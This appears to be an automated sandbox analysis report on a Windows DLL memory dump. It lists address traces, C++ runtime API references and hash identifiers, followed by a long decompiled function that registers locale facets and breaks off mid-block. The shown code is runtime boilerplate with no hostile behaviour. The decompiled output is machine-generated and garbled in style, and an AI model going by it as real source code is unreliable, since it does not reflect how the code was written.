0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f
0x6e1cf9a2
0x6e1cf9a2
0x6e1cf9a5
0x6e1cf9a9
0x6e1cf9ad
0x6e1cf9ba
0x6e1cf9c2
0x6e1cf9c4
0x00000000
0x6e1cf9c4
0x6e1cf98b
0x6e1cf98b
0x00000000
0x6e1cf98b
0x6e1cf989
0x6e1cf8fc
0x6e1cf8fc
0x6e1cf8ff
0x6e1cf903
0x6e1cf907
0x6e1cf914
0x6e1cf91c
0x6e1cf91e
0x00000000
0x6e1cf91e
0x6e1cf8e5
0x6e1cf8e5
0x00000000
0x6e1cf8e5
0x6e1cf8e3
0x6e1cf856
0x6e1cf856
0x6e1cf859
0x6e1cf85d
0x6e1cf861
0x6e1cf86e
0x6e1cf876
0x6e1cf878
0x00000000
0x6e1cf878
0x6e1cf83f
0x6e1cf83f
0x00000000
0x6e1cf83f
0x6e1cf83d
0x6e1cf7b0
0x6e1cf7b0
0x6e1cf7b3
0x6e1cf7b7
0x6e1cf7bb
0x6e1cf7c8
0x6e1cf7d0
0x6e1cf7d2
0x00000000
0x6e1cf7d2
0x6e1cf799
0x6e1cf799
0x00000000
0x6e1cf799
0x6e1cf797

APIs

__EH_prolog3.LIBCMT ref: 6E1CF760
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF76A
int.LIBCPMT ref: 6E1CF781

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1CF7A4
std::_Facet_Register.LIBCPMT ref: 6E1CF7BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF7DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF7F9

Strings

xm(n, xrefs: 6E1CF775

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: xm(n
API String ID: 113178234-949480937
Opcode ID: 402847a1e9ed1d0c857b2baa75abcd8af59b19cabba817b3e27ac913431e4983
Instruction ID: d94fd50739fe89a310836dca245b10711a3dca4ea934786211f9f8c8e8c259c0
Opcode Fuzzy Hash: 402847a1e9ed1d0c857b2baa75abcd8af59b19cabba817b3e27ac913431e4983
Instruction Fuzzy Hash: 64110A7591061D8BCF01DBD4C854AFDB7BAAF64B14F240909D520E73D0DF789988E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF229, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF229(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t251;
				signed int _t252;
				void* _t264;
				void* _t277;
				void* _t290;
				void* _t303;
				void* _t316;
				void* _t329;
				void* _t342;
				void* _t355;
				void* _t368;
				void* _t381;
				void* _t394;
				void* _t407;
				void* _t420;
				void* _t433;
				void* _t446;
				void* _t459;
				signed int _t663;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				void* _t770;

				_t715 = __edx;
				_t544 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t770 - 0x14, 0);
				_t735 =  *0x6e286db8; // 0x0
				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
				 *(_t770 - 0x10) = _t735;
				_t251 = E6E1A161C(0x6e286d6c);
				_t547 =  *((intOrPtr*)(_t770 + 8));
				_t252 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t251);
				_t717 = _t252;
				if(_t252 != 0) {
					L5:
					E6E1C66BA(_t770 - 0x14);
					return E6E1E0075(_t717);
				} else {
					if(_t735 == 0) {
						_push( *((intOrPtr*)(_t770 + 8)));
						_push(_t770 - 0x10);
						__eflags = E6E1D0F1F(__ebx, _t547, __edx, _t717, _t735) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t770 - 0x20);
							E6E1E3D74(_t770 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t717, _t735, 0x14);
							E6E1C6653(_t770 - 0x14, 0);
							_t736 =  *0x6e286dec; // 0x0
							 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
							 *(_t770 - 0x10) = _t736;
							_t264 = E6E1A161C(0x6e286d98);
							_t554 =  *((intOrPtr*)(_t770 + 8));
							_t718 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t264);
							__eflags = _t718;
							if(_t718 != 0) {
								L12:
								E6E1C66BA(_t770 - 0x14);
								return E6E1E0075(_t718);
							} else {
								__eflags = _t736;
								if(_t736 == 0) {
									_push( *((intOrPtr*)(_t770 + 8)));
									_push(_t770 - 0x10);
									__eflags = E6E1D0F87(_t544, _t554, __edx, _t718, _t736) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t770 - 0x20);
										E6E1E3D74(_t770 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t544, _t718, _t736, 0x14);
										E6E1C6653(_t770 - 0x14, 0);
										_t737 =  *0x6e286dbc; // 0x0
										 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
										 *(_t770 - 0x10) = _t737;
										_t277 = E6E1A161C(0x6e286d70);
										_t561 =  *((intOrPtr*)(_t770 + 8));
										_t719 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t277);
										__eflags = _t719;
										if(_t719 != 0) {
											L19:
											E6E1C66BA(_t770 - 0x14);
											return E6E1E0075(_t719);
										} else {
											__eflags = _t737;
											if(_t737 == 0) {
												_push( *((intOrPtr*)(_t770 + 8)));
												_push(_t770 - 0x10);
												__eflags = E6E1D0FEF(_t544, _t561, __edx, _t719, _t737) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t770 - 0x20);
													E6E1E3D74(_t770 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t544, _t719, _t737, 0x14);
													E6E1C6653(_t770 - 0x14, 0);
													_t738 =  *0x6e286df0; // 0x0
													 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
													 *(_t770 - 0x10) = _t738;
													_t290 = E6E1A161C(0x6e286d9c);
													_t568 =  *((intOrPtr*)(_t770 + 8));
													_t720 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t290);
													__eflags = _t720;
													if(_t720 != 0) {
														L26:
														E6E1C66BA(_t770 - 0x14);
														return E6E1E0075(_t720);
													} else {
														__eflags = _t738;
														if(_t738 == 0) {
															_push( *((intOrPtr*)(_t770 + 8)));
															_push(_t770 - 0x10);
															__eflags = E6E1D1057(_t544, _t568, _t715, _t720, _t738) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t770 - 0x20);
																E6E1E3D74(_t770 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t544, _t720, _t738, 0x14);
																E6E1C6653(_t770 - 0x14, 0);
																_t739 =  *0x6e286dc0; // 0x0
																 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																 *(_t770 - 0x10) = _t739;
																_t303 = E6E1A161C(0x6e286d74);
																_t575 =  *((intOrPtr*)(_t770 + 8));
																_t721 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t303);
																__eflags = _t721;
																if(_t721 != 0) {
																	L33:
																	E6E1C66BA(_t770 - 0x14);
																	return E6E1E0075(_t721);
																} else {
																	__eflags = _t739;
																	if(_t739 == 0) {
																		_push( *((intOrPtr*)(_t770 + 8)));
																		_push(_t770 - 0x10);
																		__eflags = E6E1D10BF(_t544, _t575, _t715, _t721, _t739) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t770 - 0x20);
																			E6E1E3D74(_t770 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t544, _t721, _t739, 0x14);
																			E6E1C6653(_t770 - 0x14, 0);
																			_t740 =  *0x6e286df8; // 0x0
																			 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																			 *(_t770 - 0x10) = _t740;
																			_t316 = E6E1A161C(0x6e286da4);
																			_t582 =  *((intOrPtr*)(_t770 + 8));
																			_t722 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t316);
																			__eflags = _t722;
																			if(_t722 != 0) {
																				L40:
																				E6E1C66BA(_t770 - 0x14);
																				return E6E1E0075(_t722);
																			} else {
																				__eflags = _t740;
																				if(_t740 == 0) {
																					_push( *((intOrPtr*)(_t770 + 8)));
																					_push(_t770 - 0x10);
																					__eflags = E6E1D1127(_t544, _t582, _t715, _t722, _t740) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t770 - 0x20);
																						E6E1E3D74(_t770 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t544, _t722, _t740, 0x14);
																						E6E1C6653(_t770 - 0x14, 0);
																						_t741 =  *0x6e286df4; // 0x0
																						 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																						 *(_t770 - 0x10) = _t741;
																						_t329 = E6E1A161C(0x6e286da0);
																						_t589 =  *((intOrPtr*)(_t770 + 8));
																						_t723 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t329);
																						__eflags = _t723;
																						if(_t723 != 0) {
																							L47:
																							E6E1C66BA(_t770 - 0x14);
																							return E6E1E0075(_t723);
																						} else {
																							__eflags = _t741;
																							if(_t741 == 0) {
																								_push( *((intOrPtr*)(_t770 + 8)));
																								_push(_t770 - 0x10);
																								__eflags = E6E1D11AB(_t544, _t589, _t715, _t723, _t741) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t770 - 0x20);
																									E6E1E3D74(_t770 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t544, _t723, _t741, 0x14);
																									E6E1C6653(_t770 - 0x14, 0);
																									_t742 =  *0x6e286dc8; // 0x0
																									 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																									 *(_t770 - 0x10) = _t742;
																									_t342 = E6E1A161C(0x6e286d7c);
																									_t596 =  *((intOrPtr*)(_t770 + 8));
																									_t724 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t342);
																									__eflags = _t724;
																									if(_t724 != 0) {
																										L54:
																										E6E1C66BA(_t770 - 0x14);
																										return E6E1E0075(_t724);
																									} else {
																										__eflags = _t742;
																										if(_t742 == 0) {
																											_push( *((intOrPtr*)(_t770 + 8)));
																											_push(_t770 - 0x10);
																											__eflags = E6E1D1230(_t544, _t596, _t715, _t724, _t742) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t770 - 0x20);
																												E6E1E3D74(_t770 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t544, _t724, _t742, 0x14);
																												E6E1C6653(_t770 - 0x14, 0);
																												_t743 =  *0x6e286dc4; // 0x0
																												 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																												 *(_t770 - 0x10) = _t743;
																												_t355 = E6E1A161C(0x6e286d78);
																												_t603 =  *((intOrPtr*)(_t770 + 8));
																												_t725 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t355);
																												__eflags = _t725;
																												if(_t725 != 0) {
																													L61:
																													E6E1C66BA(_t770 - 0x14);
																													return E6E1E0075(_t725);
																												} else {
																													__eflags = _t743;
																													if(_t743 == 0) {
																														_push( *((intOrPtr*)(_t770 + 8)));
																														_push(_t770 - 0x10);
																														__eflags = E6E1D12B4(_t544, _t603, _t715, _t725, _t743) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t770 - 0x20);
																															E6E1E3D74(_t770 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t544, _t725, _t743, 0x14);
																															E6E1C6653(_t770 - 0x14, 0);
																															_t744 =  *0x6e286dd8; // 0x0
																															 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																															 *(_t770 - 0x10) = _t744;
																															_t368 = E6E1A161C(0x6e286d84);
																															_t610 =  *((intOrPtr*)(_t770 + 8));
																															_t726 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t368);
																															__eflags = _t726;
																															if(_t726 != 0) {
																																L68:
																																E6E1C66BA(_t770 - 0x14);
																																return E6E1E0075(_t726);
																															} else {
																																__eflags = _t744;
																																if(_t744 == 0) {
																																	_push( *((intOrPtr*)(_t770 + 8)));
																																	_push(_t770 - 0x10);
																																	__eflags = E6E1D1339(_t544, _t610, _t715, _t726, _t744) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t770 - 0x20);
																																		E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t544, _t726, _t744, 0x14);
																																		E6E1C6653(_t770 - 0x14, 0);
																																		_t745 =  *0x6e286db0; // 0x0
																																		 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																		 *(_t770 - 0x10) = _t745;
																																		_t381 = E6E1A161C(0x6e286d64);
																																		_t617 =  *((intOrPtr*)(_t770 + 8));
																																		_t727 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t381);
																																		__eflags = _t727;
																																		if(_t727 != 0) {
																																			L75:
																																			E6E1C66BA(_t770 - 0x14);
																																			return E6E1E0075(_t727);
																																		} else {
																																			__eflags = _t745;
																																			if(_t745 == 0) {
																																				_push( *((intOrPtr*)(_t770 + 8)));
																																				_push(_t770 - 0x10);
																																				__eflags = E6E1D13A1(_t544, _t617, _t715, _t727, _t745) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t770 - 0x20);
																																					E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t544, _t727, _t745, 0x14);
																																					E6E1C6653(_t770 - 0x14, 0);
																																					_t746 =  *0x6e286ddc; // 0x0
																																					 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																					 *(_t770 - 0x10) = _t746;
																																					_t394 = E6E1A161C(0x6e286d88);
																																					_t624 =  *((intOrPtr*)(_t770 + 8));
																																					_t728 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t394);
																																					__eflags = _t728;
																																					if(_t728 != 0) {
																																						L82:
																																						E6E1C66BA(_t770 - 0x14);
																																						return E6E1E0075(_t728);
																																					} else {
																																						__eflags = _t746;
																																						if(_t746 == 0) {
																																							_push( *((intOrPtr*)(_t770 + 8)));
																																							_push(_t770 - 0x10);
																																							__eflags = E6E1D1409(_t544, _t624, _t715, _t728, _t746) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t770 - 0x20);
																																								E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t544, _t728, _t746, 0x14);
																																								E6E1C6653(_t770 - 0x14, 0);
																																								_t747 =  *0x6e286de0; // 0x0
																																								 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																								 *(_t770 - 0x10) = _t747;
																																								_t407 = E6E1A161C(0x6e286d8c);
																																								_t631 =  *((intOrPtr*)(_t770 + 8));
																																								_t729 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t407);
																																								__eflags = _t729;
																																								if(_t729 != 0) {
																																									L89:
																																									E6E1C66BA(_t770 - 0x14);
																																									return E6E1E0075(_t729);
																																								} else {
																																									__eflags = _t747;
																																									if(_t747 == 0) {
																																										_push( *((intOrPtr*)(_t770 + 8)));
																																										_push(_t770 - 0x10);
																																										__eflags = E6E1D1471(_t544, _t631, _t715, _t729, _t747) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t770 - 0x20);
																																											E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t544, _t729, _t747, 0x14);
																																											E6E1C6653(_t770 - 0x14, 0);
																																											_t748 =  *0x6e286dfc; // 0x0
																																											 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																											 *(_t770 - 0x10) = _t748;
																																											_t420 = E6E1A161C(0x6e286da8);
																																											_t638 =  *((intOrPtr*)(_t770 + 8));
																																											_t730 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t420);
																																											__eflags = _t730;
																																											if(_t730 != 0) {
																																												L96:
																																												E6E1C66BA(_t770 - 0x14);
																																												return E6E1E0075(_t730);
																																											} else {
																																												__eflags = _t748;
																																												if(_t748 == 0) {
																																													_push( *((intOrPtr*)(_t770 + 8)));
																																													_push(_t770 - 0x10);
																																													__eflags = E6E1D14EC(_t544, _t638, _t715, _t730, _t748) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t770 - 0x20);
																																														E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t544, _t730, _t748, 0x14);
																																														E6E1C6653(_t770 - 0x14, 0);
																																														_t749 =  *0x6e286dcc; // 0x0
																																														 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																														 *(_t770 - 0x10) = _t749;
																																														_t433 = E6E1A161C(0x6e286d80);
																																														_t645 =  *((intOrPtr*)(_t770 + 8));
																																														_t731 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t433);
																																														__eflags = _t731;
																																														if(_t731 != 0) {
																																															L103:
																																															E6E1C66BA(_t770 - 0x14);
																																															return E6E1E0075(_t731);
																																														} else {
																																															__eflags = _t749;
																																															if(_t749 == 0) {
																																																_push( *((intOrPtr*)(_t770 + 8)));
																																																_push(_t770 - 0x10);
																																																__eflags = E6E1D1558(_t544, _t645, _t715, _t731, _t749) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1A1438(_t770 - 0x20);
																																																	E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e2283cf, _t544, _t731, _t749, 0x14);
																																																	E6E1C6653(_t770 - 0x14, 0);
																																																	_t750 =  *0x6e286e00; // 0x0
																																																	 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																	 *(_t770 - 0x10) = _t750;
																																																	_t446 = E6E1A161C(0x6e286dac);
																																																	_t652 =  *((intOrPtr*)(_t770 + 8));
																																																	_t732 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t446);
																																																	__eflags = _t732;
																																																	if(_t732 != 0) {
																																																		L110:
																																																		E6E1C66BA(_t770 - 0x14);
																																																		return E6E1E0075(_t732);
																																																	} else {
																																																		__eflags = _t750;
																																																		if(_t750 == 0) {
																																																			_push( *((intOrPtr*)(_t770 + 8)));
																																																			_push(_t770 - 0x10);
																																																			__eflags = E6E1D15C4(_t544, _t652, _t715, _t732, _t750) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1A1438(_t770 - 0x20);
																																																				E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																																				asm("int3");
																																																				E6E1E00AC(0x6e2283cf, _t544, _t732, _t750, 0x14);
																																																				E6E1C6653(_t770 - 0x14, 0);
																																																				_t751 =  *0x6e286dd0; // 0x0
																																																				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																				 *(_t770 - 0x10) = _t751;
																																																				_t459 = E6E1A161C(0x6e286d60);
																																																				_t659 =  *((intOrPtr*)(_t770 + 8));
																																																				_t733 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t459);
																																																				__eflags = _t733;
																																																				if(_t733 != 0) {
																																																					L117:
																																																					E6E1C66BA(_t770 - 0x14);
																																																					return E6E1E0075(_t733);
																																																				} else {
																																																					__eflags = _t751;
																																																					if(_t751 == 0) {
																																																						_push( *((intOrPtr*)(_t770 + 8)));
																																																						_push(_t770 - 0x10);
																																																						__eflags = E6E1D162A(_t544, _t659, _t715, _t733, _t751) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							_t663 = _t770 - 0x20;
																																																							E6E1A1438(_t663);
																																																							E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																																							asm("int3");
																																																							E6E1E00AC(0x6e22851f, _t544, _t733, _t751, 4);
																																																							_t752 = _t663;
																																																							 *(_t770 - 0x10) = _t752;
																																																							 *((intOrPtr*)(_t752 + 4)) =  *((intOrPtr*)(_t770 + 0xc));
																																																							_push( *((intOrPtr*)(_t770 + 0x14)));
																																																							_t245 = _t770 - 4;
																																																							 *_t245 =  *(_t770 - 4) & 0x00000000;
																																																							__eflags =  *_t245;
																																																							 *_t752 = 0x6e22c0c4;
																																																							 *((char*)(_t752 + 0x28)) =  *((intOrPtr*)(_t770 + 0x10));
																																																							E6E1D542F(_t544, _t663, _t715, _t733, _t752,  *_t245);
																																																							return E6E1E0075(_t752,  *((intOrPtr*)(_t770 + 8)));
																																																						} else {
																																																							_t733 =  *(_t770 - 0x10);
																																																							 *(_t770 - 0x10) = _t733;
																																																							 *(_t770 - 4) = 1;
																																																							E6E1C6FD3(__eflags, _t733);
																																																							 *0x6e22a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t733 + 4))))();
																																																							 *0x6e286dd0 = _t733;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t733 = _t751;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t732 =  *(_t770 - 0x10);
																																																				 *(_t770 - 0x10) = _t732;
																																																				 *(_t770 - 4) = 1;
																																																				E6E1C6FD3(__eflags, _t732);
																																																				 *0x6e22a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t732 + 4))))();
																																																				 *0x6e286e00 = _t732;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t732 = _t750;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t731 =  *(_t770 - 0x10);
																																																	 *(_t770 - 0x10) = _t731;
																																																	 *(_t770 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t731);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t731 + 4))))();
																																																	 *0x6e286dcc = _t731;
																																																	goto L103;
																																																}
																																															} else {
																																																_t731 = _t749;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t730 =  *(_t770 - 0x10);
																																														 *(_t770 - 0x10) = _t730;
																																														 *(_t770 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t730);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t730 + 4))))();
																																														 *0x6e286dfc = _t730;
																																														goto L96;
																																													}
																																												} else {
																																													_t730 = _t748;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t729 =  *(_t770 - 0x10);
																																											 *(_t770 - 0x10) = _t729;
																																											 *(_t770 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t729);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t729 + 4))))();
																																											 *0x6e286de0 = _t729;
																																											goto L89;
																																										}
																																									} else {
																																										_t729 = _t747;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t728 =  *(_t770 - 0x10);
																																								 *(_t770 - 0x10) = _t728;
																																								 *(_t770 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t728);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t728 + 4))))();
																																								 *0x6e286ddc = _t728;
																																								goto L82;
																																							}
																																						} else {
																																							_t728 = _t746;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t727 =  *(_t770 - 0x10);
																																					 *(_t770 - 0x10) = _t727;
																																					 *(_t770 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t727);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t727 + 4))))();
																																					 *0x6e286db0 = _t727;
																																					goto L75;
																																				}
																																			} else {
																																				_t727 = _t745;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t726 =  *(_t770 - 0x10);
																																		 *(_t770 - 0x10) = _t726;
																																		 *(_t770 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t726);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t726 + 4))))();
																																		 *0x6e286dd8 = _t726;
																																		goto L68;
																																	}
																																} else {
																																	_t726 = _t744;
																																	goto L68;
																																}
																															}
																														} else {
																															_t725 =  *(_t770 - 0x10);
																															 *(_t770 - 0x10) = _t725;
																															 *(_t770 - 4) = 1;
																															E6E1C6FD3(__eflags, _t725);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t725 + 4))))();
																															 *0x6e286dc4 = _t725;
																															goto L61;
																														}
																													} else {
																														_t725 = _t743;
																														goto L61;
																													}
																												}
																											} else {
																												_t724 =  *(_t770 - 0x10);
																												 *(_t770 - 0x10) = _t724;
																												 *(_t770 - 4) = 1;
																												E6E1C6FD3(__eflags, _t724);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t724 + 4))))();
																												 *0x6e286dc8 = _t724;
																												goto L54;
																											}
																										} else {
																											_t724 = _t742;
																											goto L54;
																										}
																									}
																								} else {
																									_t723 =  *(_t770 - 0x10);
																									 *(_t770 - 0x10) = _t723;
																									 *(_t770 - 4) = 1;
																									E6E1C6FD3(__eflags, _t723);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t723 + 4))))();
																									 *0x6e286df4 = _t723;
																									goto L47;
																								}
																							} else {
